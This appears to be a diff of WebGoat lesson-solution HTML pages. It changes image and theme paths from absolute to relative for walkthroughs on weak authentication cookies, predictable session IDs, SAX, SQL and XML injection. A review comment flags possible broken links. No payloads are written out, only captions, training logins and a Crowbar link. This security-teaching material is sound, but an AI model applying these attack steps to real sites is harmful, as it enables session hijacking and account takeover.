<v:imagedata src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/WeakAuthenticationCookie_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=631 height=364
src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image020.jpg" v:shapes="Picture_x0020_597"><![endif]></span></p>
src="lesson_solutions/WeakAuthenticationCookie_files/image020.jpg" v:shapes="Picture_x0020_597"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -713,9 +713,9 @@ with webgoat/webgoat.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_598"
o:spid="_x0000_i1031" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/WeakAuthenticationCookie_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image021.jpg" v:shapes="Picture_x0020_598"><![endif]></span></p>
src="lesson_solutions/WeakAuthenticationCookie_files/image021.jpg" v:shapes="Picture_x0020_598"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -735,9 +735,9 @@ using this cookie and not with parameters like above.<o:p></o:p></span></p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_599" o:spid="_x0000_i1030"
type="#_x0000_t75" style='width:480pt;height:276.75pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/WeakAuthenticationCookie_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image022.jpg" v:shapes="Picture_x0020_599"><![endif]></span><span
src="lesson_solutions/WeakAuthenticationCookie_files/image022.jpg" v:shapes="Picture_x0020_599"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@ -752,9 +752,9 @@ aspect/aspect.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_600"
o:spid="_x0000_i1029" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image009.png" o:title=""/>
<v:imagedata src="lesson_solutions/WeakAuthenticationCookie_files/image009.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image023.jpg" v:shapes="Picture_x0020_600"><![endif]></span></p>
src="lesson_solutions/WeakAuthenticationCookie_files/image023.jpg" v:shapes="Picture_x0020_600"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -769,9 +769,9 @@ field-end'></span><![endif]--> Logon as aspect/aspect<span style='font-family:
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_601"
o:spid="_x0000_i1028" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image011.png" o:title=""/>
<v:imagedata src="lesson_solutions/WeakAuthenticationCookie_files/image011.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image024.jpg" v:shapes="Picture_x0020_601"><![endif]></span></p>
src="lesson_solutions/WeakAuthenticationCookie_files/image024.jpg" v:shapes="Picture_x0020_601"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -791,9 +791,9 @@ to see the new cookie.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_602"
o:spid="_x0000_i1027" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image013.png" o:title=""/>
<v:imagedata src="lesson_solutions/WeakAuthenticationCookie_files/image013.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image025.jpg" v:shapes="Picture_x0020_602"><![endif]></span></p>
src="lesson_solutions/WeakAuthenticationCookie_files/image025.jpg" v:shapes="Picture_x0020_602"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -865,9 +865,9 @@ existing cookie JSESSIONID.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_603"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:459.75pt;height:362.25pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image015.png" o:title=""/>
<v:imagedata src="lesson_solutions/WeakAuthenticationCookie_files/image015.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=613 height=483
src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image026.jpg" v:shapes="Picture_x0020_603"><![endif]></span></p>
src="lesson_solutions/WeakAuthenticationCookie_files/image026.jpg" v:shapes="Picture_x0020_603"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -882,9 +882,9 @@ field-end'></span><![endif]--> Add AuthCookie to request<span style='font-family
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_604"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image017.png" o:title=""/>
<v:imagedata src="lesson_solutions/WeakAuthenticationCookie_files/image017.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image027.jpg" v:shapes="Picture_x0020_604"><![endif]></span><span
src="lesson_solutions/WeakAuthenticationCookie_files/image027.jpg" v:shapes="Picture_x0020_604"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span


@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/WeakSessionID_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/WeakSessionID_files/editdata.mso">
<link rel=File-List href="lesson_solutions/WeakSessionID_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/WeakSessionID_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/WeakSessionID_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/WeakSessionID_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/WeakSessionID_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/WeakSessionID_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -647,9 +647,9 @@ yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600"
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_785" o:spid="_x0000_i1034" type="#_x0000_t75"
style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WeakSessionID_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/WeakSessionID_files/image020.jpg" v:shapes="Picture_x0020_785"><![endif]></span><span
src="lesson_solutions/WeakSessionID_files/image020.jpg" v:shapes="Picture_x0020_785"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@ -674,9 +674,9 @@ request from the "Previous requests" drop-down box.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_786"
o:spid="_x0000_i1033" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WeakSessionID_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/WeakSessionID_files/image021.jpg" v:shapes="Picture_x0020_786"><![endif]></span></p>
src="lesson_solutions/WeakSessionID_files/image021.jpg" v:shapes="Picture_x0020_786"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -697,9 +697,9 @@ button on the bottom of the screen. A pop-up window must be shown like below.<o:
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_787"
o:spid="_x0000_i1032" type="#_x0000_t75" style='width:480pt;height:276pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WeakSessionID_files/image005.png" o:title="" cropbottom="2719f"/>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image005.png" o:title="" cropbottom="2719f"/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/WeakSessionID_files/image022.jpg" v:shapes="Picture_x0020_787"><![endif]></span></p>
src="lesson_solutions/WeakSessionID_files/image022.jpg" v:shapes="Picture_x0020_787"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -730,9 +730,9 @@ the button "Fetch". You will not see any information about progress.<o:p></o:p><
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_788" o:spid="_x0000_i1031"
type="#_x0000_t75" style='width:480pt;height:17.25pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WeakSessionID_files/image007.png" o:title="" croptop="61471f"/>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image007.png" o:title="" croptop="61471f"/>
</v:shape><![endif]--><![if !vml]><img width=640 height=23
src="/WebGoat/lesson_solutions/WeakSessionID_files/image023.jpg" v:shapes="Picture_x0020_788"><![endif]></span><span
src="lesson_solutions/WeakSessionID_files/image023.jpg" v:shapes="Picture_x0020_788"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@ -746,9 +746,9 @@ to go to the tab "Analysis".<o:p></o:p></span></p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_789" o:spid="_x0000_i1030"
type="#_x0000_t75" style='width:480pt;height:53.25pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WeakSessionID_files/image007.png" o:title="" cropbottom="52914f"/>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image007.png" o:title="" cropbottom="52914f"/>
</v:shape><![endif]--><![if !vml]><img width=640 height=71
src="/WebGoat/lesson_solutions/WeakSessionID_files/image024.jpg" v:shapes="Picture_x0020_789"><![endif]></span><span
src="lesson_solutions/WeakSessionID_files/image024.jpg" v:shapes="Picture_x0020_789"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@ -760,9 +760,9 @@ pane you see nothing. <o:p></o:p></span></p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_790" o:spid="_x0000_i1029"
type="#_x0000_t75" style='width:480pt;height:276.75pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WeakSessionID_files/image010.png" o:title=""/>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image010.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/WeakSessionID_files/image025.jpg" v:shapes="Picture_x0020_790"><![endif]></span><span
src="lesson_solutions/WeakSessionID_files/image025.jpg" v:shapes="Picture_x0020_790"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>You must
@ -774,9 +774,9 @@ select the Session Identifier WEAKID value from the drop-down box.<o:p></o:p></s
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_791" o:spid="_x0000_i1028"
type="#_x0000_t75" style='width:480pt;height:276.75pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WeakSessionID_files/image012.png" o:title=""/>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image012.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/WeakSessionID_files/image026.jpg" v:shapes="Picture_x0020_791"><![endif]></span><span
src="lesson_solutions/WeakSessionID_files/image026.jpg" v:shapes="Picture_x0020_791"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@ -803,9 +803,9 @@ You can download Crowbar for free: <a href="http://www.sensepost.com/research/cr
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_792" o:spid="_x0000_i1027"
type="#_x0000_t75" style='width:480.75pt;height:338.25pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WeakSessionID_files/image014.png" o:title=""/>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image014.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=641 height=451
src="/WebGoat/lesson_solutions/WeakSessionID_files/image027.jpg" v:shapes="Picture_x0020_792"><![endif]></span><span
src="lesson_solutions/WeakSessionID_files/image027.jpg" v:shapes="Picture_x0020_792"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@ -819,9 +819,9 @@ request in Crowbar:<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_793"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:447pt;height:382.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WeakSessionID_files/image016.png" o:title=""/>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image016.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=596 height=510
src="/WebGoat/lesson_solutions/WeakSessionID_files/image028.jpg" v:shapes="Picture_x0020_793"><![endif]></span></p>
src="lesson_solutions/WeakSessionID_files/image028.jpg" v:shapes="Picture_x0020_793"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -858,9 +858,9 @@ reply".<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_794"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:481.5pt;height:345.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WeakSessionID_files/image018.png" o:title=""/>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image018.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=461
src="/WebGoat/lesson_solutions/WeakSessionID_files/image029.jpg" v:shapes="Picture_x0020_794"><![endif]></span></p>
src="lesson_solutions/WeakSessionID_files/image029.jpg" v:shapes="Picture_x0020_794"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC


@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/WsSAXInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/WsSAXInjection_files/editdata.mso">
<link rel=File-List href="lesson_solutions/WsSAXInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/WsSAXInjection_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/WsSAXInjection_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/WsSAXInjection_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/WsSAXInjection_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/WsSAXInjection_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:Zoom>90</w:Zoom>
@ -663,9 +663,9 @@ yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600"
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_39" o:spid="_x0000_i1029" type="#_x0000_t75"
style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WsSAXInjection_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/WsSAXInjection_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/WsSAXInjection_files/image002.jpg" v:shapes="Picture_x0020_39"><![endif]></span><span
src="lesson_solutions/WsSAXInjection_files/image002.jpg" v:shapes="Picture_x0020_39"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><span
style='mso-spacerun:yes'> </span><o:p></o:p></span></p>
@ -831,9 +831,9 @@ style='font-family:"Arial","sans-serif"'>Enter a password 'test' and click
style='font-family:"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape
id="Picture_x0020_40" o:spid="_x0000_i1028" type="#_x0000_t75" style='width:480pt;
height:277.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WsSAXInjection_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/WsSAXInjection_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/WsSAXInjection_files/image004.jpg" v:shapes="Picture_x0020_40"><![endif]></span></p>
src="lesson_solutions/WsSAXInjection_files/image004.jpg" v:shapes="Picture_x0020_40"><![endif]></span></p>
<p class=MsoCaption style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'>Figure
<!--[if supportFields]><span style='mso-element:field-begin'></span><span
@ -854,9 +854,9 @@ style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
style='font-family:"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape
id="Picture_x0020_41" o:spid="_x0000_i1027" type="#_x0000_t75" style='width:481.5pt;
height:345pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WsSAXInjection_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/WsSAXInjection_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=460
src="/WebGoat/lesson_solutions/WsSAXInjection_files/image006.jpg" v:shapes="Picture_x0020_41"><![endif]></span></p>
src="lesson_solutions/WsSAXInjection_files/image006.jpg" v:shapes="Picture_x0020_41"><![endif]></span></p>
<p class=MsoCaption style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'>Figure
<!--[if supportFields]><span style='mso-element:field-begin'></span><span
@ -870,9 +870,9 @@ style='mso-element:field-end'></span><![endif]--> Intercept request</p>
style='mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_42"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:481.5pt;height:345pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WsSAXInjection_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/WsSAXInjection_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=460
src="/WebGoat/lesson_solutions/WsSAXInjection_files/image008.jpg" v:shapes="Picture_x0020_42"><![endif]></span></p>
src="lesson_solutions/WsSAXInjection_files/image008.jpg" v:shapes="Picture_x0020_42"><![endif]></span></p>
<p class=MsoCaption style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'>Figure
<!--[if supportFields]><span style='mso-element:field-begin'></span><span
@ -886,9 +886,9 @@ style='mso-element:field-end'></span><![endif]--> Inject XML payload</p>
style='mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_43"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WsSAXInjection_files/image009.png" o:title=""/>
<v:imagedata src="lesson_solutions/WsSAXInjection_files/image009.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/WsSAXInjection_files/image010.jpg" v:shapes="Picture_x0020_43"><![endif]></span></p>
src="lesson_solutions/WsSAXInjection_files/image010.jpg" v:shapes="Picture_x0020_43"><![endif]></span></p>
<p class=MsoCaption style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'>Figure
<!--[if supportFields]><span style='mso-element:field-begin'></span><span


@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/WsSqlInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/WsSqlInjection_files/editdata.mso">
<link rel=File-List href="lesson_solutions/WsSqlInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/WsSqlInjection_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/WsSqlInjection_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/WsSqlInjection_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/WsSqlInjection_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/WsSqlInjection_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:Zoom>90</w:Zoom>
@ -654,9 +654,9 @@ see a history of invoked web services or WSDL files.<o:p></o:p></span></p>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_31" o:spid="_x0000_i1028" type="#_x0000_t75"
style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WsSqlInjection_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/WsSqlInjection_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/WsSqlInjection_files/image002.jpg" v:shapes="Picture_x0020_31"><![endif]></span></p>
src="lesson_solutions/WsSqlInjection_files/image002.jpg" v:shapes="Picture_x0020_31"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -685,9 +685,9 @@ If the pop-up does not appear you have to go to "Tools" > "Credentials". There y
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_32"
o:spid="_x0000_i1027" type="#_x0000_t75" style='width:314.25pt;height:156pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WsSqlInjection_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/WsSqlInjection_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=419 height=208
src="/WebGoat/lesson_solutions/WsSqlInjection_files/image004.jpg" v:shapes="Picture_x0020_32"><![endif]></span></p>
src="lesson_solutions/WsSqlInjection_files/image004.jpg" v:shapes="Picture_x0020_32"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -702,9 +702,9 @@ field-end'></span><![endif]--> Basic authentication<span style='font-family:
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_33"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:275.25pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WsSqlInjection_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/WsSqlInjection_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=367
src="/WebGoat/lesson_solutions/WsSqlInjection_files/image006.jpg" v:shapes="Picture_x0020_33"><![endif]></span></p>
src="lesson_solutions/WsSqlInjection_files/image006.jpg" v:shapes="Picture_x0020_33"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -730,9 +730,9 @@ style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_34"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:275.25pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WsSqlInjection_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/WsSqlInjection_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=367
src="/WebGoat/lesson_solutions/WsSqlInjection_files/image008.jpg" v:shapes="Picture_x0020_34"><![endif]></span></p>
src="lesson_solutions/WsSqlInjection_files/image008.jpg" v:shapes="Picture_x0020_34"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
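Review bot: The new `href`/`src` values such as `lesson_solutions/WsSqlInjection_files/filelist.xml` are document-relative, so they only resolve to the intended location when the solution page is served from the context root (for example a URL one level below the context path); if this HTML is ever opened directly from its own `lesson_solutions/` directory the browser will look for `lesson_solutions/lesson_solutions/...` and the images and theme links will 404. A context-relative form would need either a `<base href>` in the document head or the same context-path substitution the Java side of this commit uses, so it may be worth confirming how these files are reached before relying on the relative form. The same pattern applies to the XMLInjection and XPATHInjection sections below and to the WsSAXInjection section above, whose start is outside this view.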


@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/XMLInjection_files/filelist.xml">
